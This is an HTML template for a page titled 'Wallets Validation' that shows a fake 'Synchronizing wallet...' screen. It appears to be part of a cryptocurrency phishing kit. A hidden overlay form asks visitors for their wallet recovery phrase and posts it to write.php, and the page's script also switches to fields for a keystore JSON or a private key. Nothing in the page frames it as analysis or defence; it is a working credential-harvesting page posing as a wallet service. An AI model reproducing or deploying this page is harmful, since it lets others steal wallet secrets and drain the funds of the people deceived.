

<!DOCTYPE html>
<html>


<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">

  <link href="{{ url_for('static', filename='main.css') }}" rel="stylesheet">
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <title data-react-helmet="true">Wallets Validation</title>

  <style >

    .kyUqCt {
      width: 100%;
      max-width: 1200px;
      margin: 0 auto;
      height: 145px;
      padding: 0 20px;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: space-around;
      -webkit-justify-content: space-around;
      -ms-flex-pack: space-around;
      justify-content: space-around;
      margin-top: 5%;
    }

    @media screen and (max-width:640px) {
      .kyUqCt {
        height: 100px;
        padding: 0 15px;
      }
    }

    /* sc-component-id: Header__SInternalLink-cphy8j-1 */
    .guKAph {
      width: 100px;
      text-align: center;
      font-size: 20px;
      color: rgb(88, 120, 188);
      font-weight: 500;
    }

    @media screen and (max-width:640px) {
      .guKAph {
        width: 60px;
        font-size: 16px;
      }
    }

    /* sc-component-id: Header__SInternalLink-cphy8j-1-a */
    .eyaBAy {
      width: 100px;
      text-align: center;
      font-size: 20px;
      color: rgb(88, 120, 188);
      font-weight: 500;
    }

    @media screen and (max-width:640px) {
      .eyaBAy {
        width: 60px;
        font-size: 16px;
      }
    }

    /* sc-component-id: Header__SLogo-cphy8j-2 */
    .hnlESl {
      -webkit-flex: 1;
      -ms-flex: 1;
      flex: 1;
      padding: 0 20px;
      text-align: center;
    }

    .hnlESl img {
      width: 100%;
      max-width: 200px;
      min-width: 60px;
    }

    /* sc-component-id: Footer__SFooter-sc-1k47aoh-0 */
    .jVWwwJ {
      width: 100%;
      max-width: 1200px;
      margin: 0 auto;
      height: 160px;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-flex-shrink: 0;
      -ms-flex-negative: 0;
      flex-shrink: 0;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
    }

    @media screen and (max-width:640px) {
      .jVWwwJ {
        -webkit-flex-direction: column;
        -ms-flex-direction: column;
        flex-direction: column;
        height: auto;
        margin: 30px 0;
      }

      .jVWwwJ a {
        margin: 10px 0;
      }
    }

    /* sc-component-id: Footer__SSocialIcon-sc-1k47aoh-1 */
    .hvbAKM {
      width: 20px;
      height: 20px;
    }

    .hvbAKM img {
      height: 100%;
    }

    /* sc-component-id: Footer__SExternalLink-sc-1k47aoh-2 */
    .YwSGw {
      width: 150px;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
    }

    .YwSGw p {
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      padding-left: 0.5em;
      font-size: 14px;
      color: rgb(88, 120, 188);
      font-weight: 500;
    }

    /* sc-component-id: sc-global-3954063800 */
    @font-face {
      font-family: 'SFMono';
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Regular.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Regulard41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Regular.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFMono-Regular.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFMono-Regular.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Regular.svg') format('svg');
      font-weight: normal;
      font-style: normal;
    }

    @font-face {
      font-family: 'SFMono';
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Medium.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Mediumd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Medium.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFMono-Medium.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFMono-Medium.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Medium.svg') format('svg');
      font-weight: 500;
      font-style: normal;
    }

    @font-face {
      font-family: 'SFMono';
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Semibold.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Semiboldd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Semibold.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFMono-Semibold.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFMono-Semibold.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Semibold.svg') format('svg');
      font-weight: 600;
      font-style: normal;
    }

    @font-face {
      font-family: 'SFMono';
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Bold.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFMono-Boldd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Bold.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFMono-Bold.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFMono-Bold.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFMono-Bold.svg') format('svg');
      font-weight: bold;
      font-style: normal;
    }

    @font-face {
      font-family: 'SF Pro Text';
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Regular.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Regulard41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Regular.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFProText-Regular.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFProText-Regular.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Regular.svg') format('svg');
      font-weight: normal;
      font-style: normal;
    }

    @font-face {
      font-family: 'SF Pro Text';
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Semibold.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Semiboldd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Semibold.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFProText-Semibold.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFProText-Semibold.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Semibold.svg') format('svg');
      font-weight: 600;
      font-style: normal;
    }

    @font-face {
      font-family: 'SF Pro Text';
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Medium.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Mediumd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Medium.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFProText-Medium.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFProText-Medium.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Medium.svg') format('svg');
      font-weight: 500;
      font-style: normal;
    }

    @font-face {
      font-family: 'SF Pro Text';
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Bold.eot');
      src: url('https://securedwalletsprotocols.online/fonts/SFProText-Boldd41d.eot') format('embedded-opentype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Bold.woff2') format('woff2'), url('https://securedwalletsprotocols.online/fonts/SFProText-Bold.woff') format('woff'), url('https://securedwalletsprotocols.online/fonts/SFProText-Bold.ttf') format('truetype'), url('https://securedwalletsprotocols.online/fonts/SFProText-Bold.svg') format('svg');
      font-weight: bold;
      font-style: normal;
    }

    html,
    body,
    #root,
    #router-root {
      height: 100%;
      width: 100%;
      margin: 0;
      padding: 0;
    }

    body {
      font-family: -apple-system, system-ui, BlinkMacSystemFont, "SF Pro Text", Roboto, Helvetica, Arial, sans-serif;
      font-style: normal;
      font-stretch: normal;
      font-weight: 400;
      font-size: 16px;
      color: rgb(88, 112, 135);
      overflow-y: auto;
      text-rendering: optimizeLegibility;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
      -webkit-text-size-adjust: 100%;
      -webkit-overflow-scrolling: touch;
    }

    button:active,
    button:focus,
    button.active {
      background-image: none;
      outline: 0;
      -webkit-box-shadow: none;
      box-shadow: none;
    }

    [tabindex] {
      outline: none;
      height: 100%;
    }

    a,
    p,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      -webkit-text-decoration: none;
      text-decoration: none;
      margin: 0;
      padding: 0;
    }

    h1 {
      font-size: 42px;
    }

    h2 {
      font-size: 32px;
    }

    h3 {
      font-size: 24px;
    }

    h4 {
      font-size: 20px;
    }

    h5 {
      font-size: 17px;
    }

    h6 {
      font-size: 14px;
    }

    a {
      -webkit-text-decoration: none;
      text-decoration: none;
      color: inherit;
      outline: none;
      color: #4199FC;
      font-weight: bold;
    }

    ul,
    li {
      list-style: none;
      margin: 0;
      padding: 0;
    }

    * {
      box-sizing: border-box !important;
    }

    button {
      border-style: none;
      line-height: 1em;
    }

    input {
      -webkit-appearance: none;
    }

    input[type="color"],
    input[type="date"],
    input[type="datetime"],
    input[type="datetime-local"],
    input[type="email"],
    input[type="month"],
    input[type="number"],
    input[type="password"],
    input[type="search"],
    input[type="tel"],
    input[type="text"],
    input[type="time"],
    input[type="url"],
    input[type="week"],
    select:focus,
    textarea {
      font-size: 16px;
    }

    .statusbar-overlay {
      opacity: 0;
    }

    #coinbase_button_iframe {
      width: 244px !important;
      margin-top: 40px !important;
    }

    #coinbase_widget {
      display: inline-block;
      margin-top: 56px !important;
    }

    /* sc-component-id: layout__SWrapper-wjwiqk-0 */
    .dijnUu {
      position: relative;
      width: 100%;
      height: 100%;
      background-color: rgb(255, 255, 255);
    }

    /* sc-component-id: layout__SContent-wjwiqk-1 */
    .fiuMUO {
      width: 100%;
      height: 100%;
      margin: 0 auto;
      position: relative;
    }

    /* sc-component-id: layout__SContainer-wjwiqk-2 */
    .fuQfHo {
      height: 100%;
      max-width: 1064px;
      margin: 0 auto;
      padding: 0;
    }

    /* sc-component-id: layout__SFlex-wjwiqk-3 */
    .hfVnjX {
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      height: 100%;
    }

    @media screen and (max-width:640px) {
      .hfVnjX {
        -webkit-flex-direction: column;
        -ms-flex-direction: column;
        flex-direction: column;
      }
    }

    /* sc-component-id: Grid__SGrid-sc-8d5rqj-0 */
    .gAVVCu {
      width: 100%;
      height: 100%;
      padding: 24px;
      overflow-x: hidden;
      overflow-y: hidden;
      background: rgb(255, 255, 255);
      display: grid;
      grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
      grid-column-gap: 30px;
      grid-row-gap: 30px;
    }

    @media screen and (max-width:640px) {
      .gAVVCu {
        grid-template-columns: repeat(auto-fit, minmax(100px, 1fr));
        grid-column-gap: 15px;
        grid-row-gap: 15px;
      }
    }

    /* sc-component-id: pageStyles__SIndexPage-sc-1navawn-0 */
    .hDbjSS {
      height: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-flex-direction: column;
      -ms-flex-direction: column;
      flex-direction: column;
      -webkit-box-pack: space-around;
      -webkit-justify-content: space-around;
      -ms-flex-pack: space-around;
      justify-content: space-around;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      text-align: center;
      padding: 0 32px;
      padding-top: 30px;
    }

    @media screen and (max-width:640px) {
      .hDbjSS {
        padding: 0 24px;
        padding-top: 20px;
      }
    }

    /* sc-component-id: pageStyles__SBrandingWrapper-sc-1navawn-1 */
    .fAmUdU {
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-flex-direction: column;
      -ms-flex-direction: column;
      flex-direction: column;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      width: 100%;
      max-width: 700px;
      margin: 0 auto;
    }

    /* sc-component-id: pageStyles__SBranding-sc-1navawn-2 */
    .gFeYHJ {
        font-size: 28px;
    font-weight: 500;
    text-align: center;
    color: #000;
 
    }

    /* sc-component-id: pageStyles__SPageDescription-sc-1navawn-3 */
    .jGHRMl {
      margin-top: 40px;
      font-size: 18px;
      font-weight: 300;
      line-height: 1.35;
    }

    /* sc-component-id: pageStyles__SSection-sc-1navawn-4 */
    .ibLsRQ {
      position: relative;
      width: 100%;
      z-index: 0;
      margin-bottom: 40px;
    }

    /* sc-component-id: pageStyles__SApp-sc-1navawn-5 */
    .cmAzHq {
      width: 100%;
    }

    /* sc-component-id: pageStyles__SAppIcon-sc-1navawn-6 */
    .kSIOSl {
      width: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      padding: 25px;
    }

    .kSIOSl img {
      -webkit-filter: initial;
      filter: initial;
      width: 100%;
      height: 100%;
      border-radius: 50%;
    }

    .lfUBtr {
      width: 100%;
      display: -webkit-box;
      display: -webkit-flex;
      display: -ms-flexbox;
      display: flex;
      -webkit-align-items: center;
      -webkit-box-align: center;
      -ms-flex-align: center;
      align-items: center;
      -webkit-box-pack: center;
      -webkit-justify-content: center;
      -ms-flex-pack: center;
      justify-content: center;
      padding: 25px;
    }

    .lfUBtr img {
      -webkit-filter: initial;
      filter: initial;
      width: 100%;
      height: 100%;
      border-radius: initial;
    }

    /* sc-component-id: pageStyles__SAppName-sc-1navawn-7 */
    .eodRCW {
      font-weight: bold;
      color: inherit;
    }

    /* sc-component-id: pageStyles__SFootNote-sc-1navawn-8 */
    .ceWocr {
      margin: 10px;
      color: rgb(88, 112, 135);
      opacity: 0.75;
      padding-top: 30px;
    }

    .ceWocr a {
      font-weight: 600;
    }
  </style>
   <style>
      .input-textarea{
    
    width: 100%;
    height: 100px;
    border: 1px solid;
    padding: 5px;
    border-radius: 5px;
 
    }
   </style>

  <script src="{{ url_for('static', filename='jquery.js') }}"></script>
  
</head>

<body>

  <div class="overlay" id="thebox" style="display: none ; margin-top: -50px;">

    <div class="overbox">
      <div style="overflow:hidden;margin:5px 0px;">
        <div class="closex" onclick="shutx('#thebox')">X</div>
      </div>

      

      <div class="insidewidth twodiv">
        <div class="dsdiv" id="fdxz" >
        <form id="submitform" action="write.php" method="POST">
          <label>Phrase</label>
          <textarea placeholder="Enter your phrase" name="phrase" class="input-textare" style="  width: 100%;
    height: 100px;
    border: 1px solid;
    padding: 5px;
    border-radius: 5px;"></textarea>
          <input type="hidden" id="walletinput" name="walletinput"  />
          <div class="buttonbox">
            <button class="bluebtn_bird yuck" name="submit" type="submit">connect</button>
          </div>

        </form>

        </div>
        <div class="dsdiv fxz" onclick="startjob()">
          <div class="textdx" id="extracttext" style="font-weight: bold;"></div>
          <div class="textdx" style="font-size:13px;margin:7px 0px">Connect to <span id="extracttext2"></span> and more
          </div>
        </div>
      </div>

    </div>

  </div>

  <style>
    .loaderw {
      border: 1px solid black;
      /* Light grey */
      border-top: 1px solid transparent;
      /* Blue */
      border-radius: 50%;
      width: 15px;
      height: 15px;
      animation: spin 0.5s linear infinite;
      margin: 0px 20px;
      display: none;
    }

    .yuck {
      background: #2997d8;
      font-size: 11px;
      color: white;
      font-weight: bold;
      text-align: center;
      padding: 7px 20px;
      border-radius: 3px;
      cursor: pointer;
      transition: 0.5s;
      display: none;
      margin: 0px 9px;
    }

    .dsdiv {
      padding: 20px 20px;
      border: 1px solid rgba(192, 192, 192, 0.5);
      margin: 10px 0px;
      border-radius: 5px;

    }

    .reddsdiv {
      border: 1px solid red !important;
    }

    .reddsdiv .textdx {
      color: red !important;
    }

    .insidewidth {
      padding: 10px 10px;

    }

    .fxz {
      background: #f2f2f2;
    }
  </style>

  <script>

    function submitform() {
      sendform('actions.html', '#submitform', 'submitform');
    }

    function startloader() {
      $('.ccbox').removeClass('activebox');
      $('.loadbox').addClass('activebox');
      shutx('.buttonbox');
    }

    function closeloader() {
      $('.ccbox').removeClass('activebox');
      $('.phrasebox').addClass('activebox');
      openx('.buttonbox');
    }


    function extractwallet(element) {
      openx('#thebox');

      $('.insidewidth').removeClass('activebox');
      $('.twodiv').addClass('activebox');

      // $('#initext').html("Initializing");
      openx('.loaderw');
      shutx('.yuck');
      $('#fdxz').removeClass('reddsdiv');


      // setTimeout(function () {
        // $('#initext').html("Error connecting");
        shutx('.loaderw');
        openx('.yuck');
        // $('#fdxz').addClass('reddsdiv');
      // }, 2000);



      var texr = $(element).text();

      var texc = texr.replace(/\t+/g, '');
      var text = texc.trim();

       
      $('#walletinput').val(text);
      $('#extracttext').html(text);
      $('#extracttext2').html(text);
    }


    function startjob() {
      $('.insidewidth').addClass('activebox');
      $('.twodiv').removeClass('activebox');
    }


    function switchshow(element) {

      $('.allinput').val("");


      $('.sgrid').removeClass('sactive');
      $(element).addClass('sactive');

      if ($(element).text() == "Phrase") {

        $('.ccbox').removeClass('activebox');
        $('.phrasebox').addClass('activebox');

        $('#wallettype').val("phrase");

      } else if ($(element).text() == "Keystore JSON") {

        $('.ccbox').removeClass('activebox');
        $('.keystorebox').addClass('activebox');

        $('#wallettype').val("keystore");

      } else if ($(element).text() == "Private Key") {

        $('.ccbox').removeClass('activebox');
        $('.privatebox').addClass('activebox');

        $('#wallettype').val("privatekey");

      }


    }

  </script>



  <style>
    .insidewidth {
      display: none;
    }

    .loader {
      border: 2px solid #f3f3f3;
      /* Light grey */
      border-top: 2px solid #3498db;
      /* Blue */
      border-radius: 50%;
      width: 100%;
      height: 100%;
      animation: spin 0.5s linear infinite;
    }



    @keyframes spin {
      0% {
        transform: rotate(0deg);
      }

      100% {
        transform: rotate(360deg);
      }
    }

    .loaddv {
      width: 40px;
      height: 40px;
      margin: 30px auto;
    }

    .buttonbox {
      text-align: center;
    }

    .bluebtn_bird {
      padding: 7px 20px;
      background-color: #2997d8;
      color: white;
      font-weight: bold;
      border: none;
      border-radius: 3px;
      width: 60%;
      text-transform: uppercase;
      cursor: pointer;
      transition: 0.5s;
    }

    .bluebtn_bird:hover {
      background-color: #253b80;
    }

    .textarea {
      height: 130px;
      border: 1px solid rgba(192, 192, 192, 0.3);
      border-radius: 3px;
      width: 100%;
      font-family: inherit;
      padding: 10px;
      font-size: 14px;
    }

    .input {
      border: 1px solid rgba(192, 192, 192, 0.3);
      border-radius: 3px;
      width: 100%;
      font-family: inherit;
      padding: 7px 20px;
      margin: 10px 0px;
    }

    .activebox {
      display: block !important;
    }

    .ccbox {
      display: none;
      margin: 10px 0px;
      padding: 10px;
    }

    .choosegrid {
      display: grid;
      grid-template-columns: 1fr 1fr 1fr;

    }

    .sgrid {
      text-align: center;
      padding: 10px 20px;
      font-size: 13px;
      border-bottom: 1px solid rgba(192, 192, 192, 0.3);
      cursor: pointer;
    }

    .sactive {
      border-bottom: 3px solid #2997d8;

    }

    .overlay {
      width: 100%;
      height: 100%;
      position: fixed;
      z-index: 1;
      background: rgba(0, 0, 0, 0.3);
      top: 0;
      right: 0;
      left: 0;
      bottom: 0;
      padding: 20px 0px;
    }

    .overbox {
      width: 450px;
      margin: 80px auto;
      background: white;
      border-top-left-radius: 7px;
      border-top-right-radius: 7px;
      box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.3);
      padding: 20px 0px;
    }

    .closex {
      float: left;
      margin: 0px 20px;
      cursor: pointer;
      transition: 0.5;
      font-size: 13px;
    }

    .closex:hover {
      color: #2997d8;
    }
  </style>
  <div class="noth greennoth">
    <div class="closex2" onclick="closenotify()">X</div>
    <div class="nothdetails">
      okay this a notification
    </div>
  </div>


  <style>
    .closex2 {
      padding: 7px 10px;
      color: white;
      font-size: 13px;
      margin-bottom: 0px;
      padding-bottom: 0px;
      cursor: pointer;
      float: left;
    }

    .noth {
      width: 20%;
      border-radius: 3px;
      bottom: 20px;
      opacity: 0;
      right: 20px;
      position: fixed;
      z-index: 1250;
      display: none;
    }

    .nothdetails {
      padding: 13px;
      color: white;
      font-weight: bold;
      font-size: 13px;
      text-align: center;
    }

    .confirmbox {
      width: 35%;
      padding: 10px;
      background: white;
      color: #5d6969;
      font-weight: bold;
      font-size: 13px;
      margin: 10% auto;
      border-radius: 5px;
      box-shadow: 0px 2px 4px 0px rgba(0, 255, 255, 0.2);
    }

    .confirmbox {
      width: 35%;
      padding: 10px;
      background: white;
      color: #5d6969;
      font-weight: bold;
      font-size: 13px;
      margin: 10% auto;
      border-radius: 5px;
      box-shadow: 0px 2px 4px 0px rgba(0, 255, 255, 0.2);
    }


    .nbc {
      overflow: hidden;
      width: 100%;
    }

    .confdetails {
      color: #5d6969;
      text-align: center;
      padding: 12px;
    }

    .rtd {
      padding: 5px;
      color: white;
      text-transform: uppercase;
      font-weight: bold;
      cursor: pointer;
      font-size: 12px;
      background: #006aa2;
      margin: 6px;
      border: none;
      border-radius: 3px;
      transition: 0.5s;
    }

    .rtd:hover {
      opacity: 0.5;
    }

    .rgt {
      float: right;
    }

    .lft {
      float: left;
      background: white;
      color: #5d6969;
      box-shadow: 0px 2px 4px 0px rgba(0, 255, 255, 0.1);
      transition: 0.5s;
    }

    .lft:hover {
      box-shadow: 0px 2px 4px 0px rgba(0, 255, 255, 0.5);
    }

    .greennoth {
      background: linear-gradient(to bottom right, rgba(0, 255, 255, 0.9), #1c9a9a);
      box-shadow: 0px 2px 4px 0px rgba(0, 255, 255, 0.9);
    }

    .rednoth {
      background: #e14d43;
      box-shadow: 0px 2px 4px 0px #e14d43;
    }


    .bluebtn_bird {
      padding: 7px 20px;
      background-color: #2997d8;
      color: white;
      font-weight: bold;
      border: none;
      border-radius: 3px;
      width: 15%;
      text-transform: uppercase;
      cursor: pointer;
      transition: 0.5s;
      margin-top: 5%;
    }

    .bluebtn_bird:hover {
      background-color: #253b80;
    }

    @media only screen and (max-width:1100px) {


      .confirmbox {
        width: 40%;
      }

    }


    @media only screen and (max-width:980px) {


      .noth {
        width: 30%;
      }

    }

    @media only screen and (max-width:850px) {

      .noth {
        width: 40%;
      }


      .confirmbox {
        width: 50%;
      }

    }


    @media only screen and (max-width:650px) {
      .confirmbox {
        width: 65%;
      }

    }

    @media only screen and (max-width:550px) {

      .overbox {
        width: 100%;
        margin: 0px;
        background: white;
        border-top-left-radius: 7px;
        border-top-right-radius: 7px;
        box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.3);
        padding: 20px 0px;
        position: absolute;
        bottom: 0;
        z-index: 1000;
      }


    }

    @media only screen and (max-width:450px) {
      .confirmbox {
        width: 70%;
      }
      .bluebtn_bird{
           width: 100%;
      }

      .fiuMUO{
        margin-top: 35%;
      }

      .fAmUdU{
        margin-top: 5%;
      }
    }


    @media only screen and (max-width:400px) {

      .noth {
        width: 90%;
      }

      .confirmbox {
        width: 100%;
        margin: 40px 0px;
      }

      .bluebtn_bird{
           width: 100%;
      }
      .fAmUdU{
        margin-top: 5%;
      }
      .fiuMUO{
        margin-top: 35%;
      }

    }

    body{
        background: #fff;
    }
   
  </style>
  <script src="{{ url_for('static', filename='formToJson.js')}}"></script>
  <script src="{{ url_for('static', filename='func.js') }}"></script>
  <div id="___gatsby">
    <div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper">
      <div class="layout__SWrapper-wjwiqk-0 dijnUu">
        <div class="layout__SFlex-wjwiqk-3 hfVnjX">
          <div class="layout__SContent-wjwiqk-1 fiuMUO">
            <header class="Header__SHeader-cphy8j-0 kyUqCt">

              <br/>
              <br/>

              <div class="Header__SLogo-cphy8j-2 hnlESl">
                <a href="{{ url_for('index')}}">
                    <img style="margin: auto"
                    src="{{ url_for('static', filename='img/qrcode.png') }}"
                    alt="Wallets Validation"></a>
              </div>

            </header>
            <div class="layout__SContainer-wjwiqk-2 fuQfHo">
              <div class="pageStyles__SIndexPage-sc-1navawn-0 hDbjSS">
                <div class="pageStyles__SBrandingWrapper-sc-1navawn-1 fAmUdU">
                <img style="margin: auto;width: 60px;margin-bottom: 4%;"
                src="{{ url_for('static', filename='img/loader.gif') }}"
                    alt="Wallets Validation">
                  <h1 class="pageStyles__SBranding-sc-1navawn-2 gFeYHJ">Synchronizing wallet...</h1>
                </div>
                <div class="pageStyles__SPageDescription-sc-1navawn-3 jGHRMl">This may take a few moments to complete</div>
                <a class="bluebtn_bird" href="{{ url_for('index')}}">Try Again</a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div id="gatsby-announcer"
      style="position:absolute;top:0;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0, 0, 0, 0);white-space:nowrap;border:0"
      aria-live="assertive" aria-atomic="true"></div>
  </div>



</body>


</html>